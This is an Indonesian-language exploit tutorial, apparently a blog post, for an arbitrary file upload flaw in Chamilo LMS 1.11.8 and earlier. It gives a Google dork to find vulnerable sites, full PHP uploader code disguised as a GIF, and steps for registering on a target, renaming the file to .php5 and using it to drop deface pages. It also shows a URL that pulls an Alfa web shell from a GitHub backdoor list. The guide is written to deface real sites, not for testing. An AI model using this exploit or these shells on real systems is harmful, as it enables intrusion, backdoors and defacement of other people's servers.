Chamillo LMS Arbitrary File Upload 1.11.8


# Judul Eksploitasi: Chamillo LMS Arbitrary File Upload
# Google Dork: "powered by chamilo" 
# Tanggal: 10/05/2018 
# Memanfaatkan Pengarang: Sohel Yousef Jellyfish Security Team
# Tautan Perangkat Lunak: https://chamilo.org/en/download/ 
# Versi: Chamilo 1.11.8 atau lebih rendah ke 1.8 
# Kategori: webapps 

Untuk file uploadernya gunakan script dibawah ini, buat file baru > copy paste uploadernya > dan simpan dengan nama bebas dengan format file gif. Contoh nya menjadi uploader.gif.
loading...


<head>
  <title>PHP Test</title>
  <form action="" method="post" enctype="multipart/form-data">
  <input type="file" name="fileToUpload" id="fileToUpload">
  <input type="submit" value="upload file" name="submit">
  </form>
 </head>
 <body>
 <?php echo '<p>FILE UPLOAD</p><br>';
 $tgt_dir = "uploads/";
 $tgt_file = $tgt_dir.basename($_FILES['fileToUpload']['name']);
 echo "<br>TARGET FILE= ".$tgt_file;
 //$filename = $_FILES['fileToUpload']['name'];
 echo "<br>FILE NAME FROM VARIABLE:- ".$_FILES["fileToUpload"]["name"];
 if(isset($_POST['submit']))
 {
 if(file_exists("uploads/".$_FILES["fileToUpload"]["name"]))
    { echo "<br>file exists, try with another name"; }
 else   {
         echo "<br>STARTING UPLOAD PROCESS<br>";
        if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"],
$tgt_file))
        { echo "<br>File UPLOADED:- ".$tgt_file; }

          else  { echo "<br>ERROR WHILE UPLOADING FILE<br>"; }
    }
 }
?>
 </body>
</html>

Lalu kalian buat sc depes sendiri, aku sarankan jangan yang ribet dan juga tidak berat bisa juga kalian gunakan metode jso, jika pas upload script tetapi sehabis itu error (403) kurangi banyak kodingan nya, untuk yang saya pakai hanya sebesar 1kb saja gan, jika ingin di tiru silahkan kalian copy paste > simpan

Itu saja yang perlu disiapkan. Untuk shell php ( raw file ) bisa didapat dari github atau di mana saja buat sendiri juga bisa, bapac kau juga bisa Sekarang cari targetnya dengan menggunakan dork diatas. Lalu daftar dulu di LMS nya, ganti url target nya seperti contoh dibawah ini :
Url : https://target.com/chamilo https://target.com/chamilo/main/auth/inscription.php
Url : https://target.com https://target.com/main/auth/inscription.php
Setelah mendaftar. Ganti url menjadi : /main/social/myfiles.php
Lalu upload file nya dengan klik tombol upload.
Upload file uploader ( File gif ) yang tadi sudah di buat. Lalu rename filenya dan ubah formatnya menjadi php5 atau php7. Semisal nama filenya uploader.gif ubah menjadi uploader.php5.
 Lokasu file nya dapat di lihat di informasi file nya:
 Buka File Uploadernya, pilih file deface. File deface akan di upload di direktori yang sama denga file uploadernya. Contoh :
Url :http://target.com/app/upload/users/3/30/my_files/uploader.php5 Maka file deface dapat diakses di http://target.com/app/upload/users/3/30/my_files/nama_script_deface.php Isi direktori dengan "../" untuk upload ke folder sebelumnya. Jika ingin mundur 2 folder isi dengan "../../" dst. Lalu klik "Execute" untuk upload file defacenya.
-jika bingung- Jika kalian bingung dengan cara di atas. Kalian bisa memakai shell Alfa. Tambahkan parameter pada file uploadernya. Sehingga urlnya menjadi. Url:http://target.com/[path]/uploader.php5?url=https://github.com/backdoorhub/shell-backdoor-list/blob/master/shell/php/alfa.php
done
LihatTutupKomentar
loading...